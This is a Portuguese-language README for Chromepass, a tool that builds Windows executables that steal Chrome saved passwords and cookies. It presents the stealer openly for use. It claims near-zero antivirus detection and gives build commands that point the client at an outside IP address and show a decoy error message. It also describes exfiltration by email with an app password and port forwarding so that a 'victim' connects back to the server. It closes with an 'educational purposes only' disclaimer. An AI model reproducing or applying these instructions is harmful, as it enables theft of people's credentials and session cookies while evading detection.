
Chromepass - Hackeando senhas salvas do Chrome
Ver Demonstração
·
Reportar Bug
·
Solicitar Funcionalidade
Chromepass é uma aplicação de console baseada em Python que gera um executável para Windows com as seguintes funcionalidades:
A nova metodologia de construção do cliente praticamente garante uma taxa de detecção de 0%, mesmo sem táticas de evasão de antivírus. Se isso se tornar falso no futuro, alguns métodos serão implementados para melhorar a evasão de antivírus.
Exemplo de varreduras recentes (nota: dentro de 10-12 horas passamos de 0-2 detecções para 32 detecções, então execute a análise em suas próprias construções):
Esta é uma aplicação muito simples, que utiliza apenas:
Recomenda-se realizar a instalação dentro de uma VM Windows. Algumas partes do procedimento de instalação podem ser afetadas por configurações existentes. Isso foi testado em uma VM Windows 10 limpa.
Chromepass requer Windows para compilar! Suporte para Linux e macOS pode ser adicionado em breve.
git clone https://github.com/darkarp/chromepass
Nota: Alternativamente, você pode baixar a versão mais recente, já que o repositório pode ser mais propenso a bugs.
As dependências são verificadas e instaladas automaticamente, então você pode pular para Uso. Recomenda-se usar uma VM limpa, apenas para garantir que não haja conflitos.
Se você não tiver as dependências e sua internet não for rápida, isso levará um tempo. Vá pegar um café.
Chromepass é muito direto. Comece executando:
python create.py -h
Uma lista de opções aparecerá e são autoexplicativas.
Executar sem parâmetros criará o servidor e o cliente conectando-se a 127.0.0.1.
Um exemplo simples de uma construção:
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'
Depois de criar o servidor e o cliente, certifique-se de que o servidor esteja em execução quando o cliente for executado.
Os cookies e senhas serão salvos em arquivos json em uma nova pasta chamada data no mesmo diretório do servidor, separados por endereço IP.
Chromepass suporta o envio dos arquivos por email, embora ainda seja experimental.
Para ativar isso, use a flag --email ao criar o servidor. Você precisará de duas coisas: um nome de usuário (seu email) e uma senha (uma senha de aplicativo).
Para gerar uma senha de aplicativo, vá para suas configurações de conta -> Segurança e ative a autenticação em duas etapas (obrigatório!)
Após a autenticação em duas etapas estar ativada, você verá uma nova opção chamada Senhas de aplicativo:

Clique lá e escolha as opções apropriadas e, em seguida, gere uma senha:

Após clicar em Gerar, você receberá a senha necessária.
Você pode usar o nome de usuário e senha diretamente no comando, ou simplesmente colocá-los no config.ini, onde está escrito YOUR_USERNAME e YOUR_PASSWORD.
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'An Error has happened' --email
Se você deseja usar isso em um cenário remoto, também deve fazer o encaminhamento de porta (porta 80 por padrão), para que quando a vítima executar o cliente, ele consiga se conectar ao servidor na porta correta.
Para informações mais gerais, clique aqui. Se ainda assim não estiver satisfeito, faça uma pesquisa no Google.
A configuração automatizada é experimental. Por uma razão ou outra, a configuração pode falhar ao instalar corretamente as dependências. Nesse caso, você deve instalá-las manualmente.
Felizmente, existem apenas 2 dependências:
Em vez das ferramentas de compilação, você também pode instalar o Visual Studio, mas ocupará mais espaço.
Após instalar com sucesso as ferramentas de compilação, basta executar o rustup-init.exe do site Rustup.
Isso completa as dependências necessárias e você deve estar pronto para prosseguir.
Se você encontrar um erro ou bug, por favor, reporte-o como uma issue. Se desejar sugerir uma funcionalidade ou melhoria, por favor, reporte-o nas páginas de issues.
Por favor, siga os modelos mostrados ao criar a issue.
Para acesso a uma comunidade cheia de aspirantes a especialistas em segurança de computadores, desde o iniciante completo até o veterano experiente, entre no nosso Servidor Discord: WhiteHat Hacking
Se você deseja entrar em contato comigo, pode fazê-lo através de: [email protected]
Não sou responsável pelo que você faz com as informações e código fornecidos. Isso é destinado apenas para fins profissionais ou educacionais.
